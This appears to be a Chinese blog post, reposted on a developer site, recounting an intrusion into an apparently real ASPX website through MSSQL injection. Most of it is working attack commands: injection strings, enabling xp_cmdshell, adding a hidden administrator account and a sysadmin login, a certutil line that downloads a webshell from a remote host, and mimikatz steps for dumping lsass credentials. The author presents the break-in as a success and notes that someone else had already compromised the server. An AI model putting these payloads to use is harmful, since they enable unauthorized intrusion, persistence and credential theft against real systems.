一次曲折的注入

栏目: 数据库 · 发布时间: 6年前

内容简介:显示登录成功,则是命令执行成功,成功开启xp_cmdshell,然后可以执行命令了,但是执行命令没有回显,正常现象;直接添加用户,显示执行成功,但是没有用户添加上,郁闷,之后才发现是火绒的问题。执行cmd获取回显:

之前写了好多的实战文章,由于敏感都在本地记录了,等网站漏洞修复完成之后慢慢的分享一些思路和技巧。本文首发于tools,然后在博客转载。一次偶然发现了一处注入,apsx注入,之前练得少,决定试一试看看,先sqlmap跑一波。

一次曲折的注入 一次曲折的注入

500报错,可能跑不出来,于是试试手工,sqlmap被拦了,但是手工很顺利,可能是加了sqlmap的指纹了吧;

一次曲折的注入

判断版本’ or @@version>0 –

一次曲折的注入
计算机名 ' or @@SERVERNAME>0 --
爆当前数据库名 ' or db_name()>0 --

网站没有找见后台,想着跑出来密码也没有登录地方,于是那些查找数据库、表名、字段名就直接略过,跑出来也登不进去。先看看其他网站,于是先跑一下二级域名以及旁站,bing查询确实很棒,可以查出好多旁站,极力推荐;

发现三处旁站,一个 php 的、一个oa还有一个致远协同,没有可以利用的地方,还是先看看注入吧;

先看注入, 当前用户 ‘ or user_name()>0 –

一次曲折的注入

判断是否支持多句查询’;declare @s int;–

一次曲折的注入

查看一下xp_cmdshell是否开启

一次曲折的注入

首先开启一下xp_cmdshell

';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

显示登录成功,则是命令执行成功,成功开启xp_cmdshell,然后可以执行命令了,但是执行命令没有回显,正常现象;直接添加用户,显示执行成功,但是没有用户添加上,郁闷,之后才发现是火绒的问题。

';exec master..xp_cmdshell 'net user web$ Web123!@# /add';--
';exec master..xp_cmdshell 'net localgroup administrators web$ /add';--

执行cmd获取回显:

';create table temp(id int identity(1,1),a varchar(8000));--   创建一个表
';insert into temp exec master.dbo.xp_cmdshell 'whoami'; --   执行cmd指令并且插入到表中
' and (select substring((select a from temp for xml auto),1,8000))>0;-- 可以一次得到所有的结果
';drop table temp;--  删除表

一次曲折的注入 一次曲折的注入 目标显示开启了1433,3389,3306端口,于是可以添加sa用户然后远程连接,增加sa用户:

';exec master.dbo.sp_addlogin test,password;--
';exec master.dbo.sp_addsrvrolemember test,sysadmin;--

可以直接连接,方便好多,比刚才执行命令舒服了好多;

一次曲折的注入

完美,可以直接执行命令,美滋滋。CS或者Msf直接撸之,但是没有vps就很心疼啊,只能找个 shell 远程下载了。发现旁站php的配置文件,然后还有phpmyadmin,这里有几个思路拿shell:

直接远程下载到web路径;
旁站phpmyadmin后台拿shell;
旁站登录后台拿shell;

第一个:

直接下载,然后,或者直接下载wce或者procdump.exe直接读取管理员密码然后登录,美滋滋。

certutil.exe -urlcache -split -f http://xxx/uploads/conf1g.txt conf1g.php
move conf1g.php  E:\xxxxx\   失败

直接500报错,看来是有waf,难怪slamp一直跑不出来,直接换个过狗的吧

一次曲折的注入 一次曲折的注入 一次曲折的注入

第二个:

phpmyadmin后台登录几种建表方式没有成功,然后日志写shell也没有成功

一次曲折的注入 一次曲折的注入

第三种

php站进入后台拿shell,密码还没有解开,暂时无法登录拿shell

还是用第一种方法吧,最近发布的冰蝎管理shell,免杀还是不错的,大马带小马,可以简单操作了

一次曲折的注入

抓hash

wce 失败

Procdump导出,使用mimikatz

mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonPasswords full

一次曲折的注入 成功拿到密码登录,直接登录之,之后就不截图了,进去之后发现已经有人光顾过了,有点厉害。


以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

Java Web开发实战经典(基础篇)

Java Web开发实战经典(基础篇)

李兴华、王月清 / 清华大学出版社 / 2010-8 / 69.80元

本书用通俗易懂的语言和丰富多彩的实例,通过对Ajax、JavaScript、HTML等Web系统开发技术基础知识的讲解,并结合MVC设计模式的理念,详细讲述了使用JSP及Struts框架进行Web系统开发的相关技术。 全书分4部分共17章,内容包括Java Web开发简介,HTML、JavaScript简介,XML简介,Tomcat服务器的安装及配置,JSP基础语法,JSP内置对象,Java......一起来看看 《Java Web开发实战经典(基础篇)》 这本书的介绍吧!

RGB转16进制工具
RGB转16进制工具

RGB HEX 互转工具

HTML 编码/解码
HTML 编码/解码

HTML 编码/解码

正则表达式在线测试
正则表达式在线测试

正则表达式在线测试